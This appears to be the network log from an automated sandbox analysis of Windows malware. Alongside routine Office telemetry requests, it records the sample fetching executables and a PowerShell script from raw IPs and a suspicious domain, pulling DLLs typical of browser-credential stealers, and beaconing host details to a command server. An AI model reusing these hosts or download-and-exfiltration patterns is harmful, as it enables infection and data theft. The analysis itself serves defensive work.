Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowe equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a964aafb6ec188b485ed; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b8dd09ab4a897d9d4420b7ba; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35052Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 11 Nov 2024 23:07:37 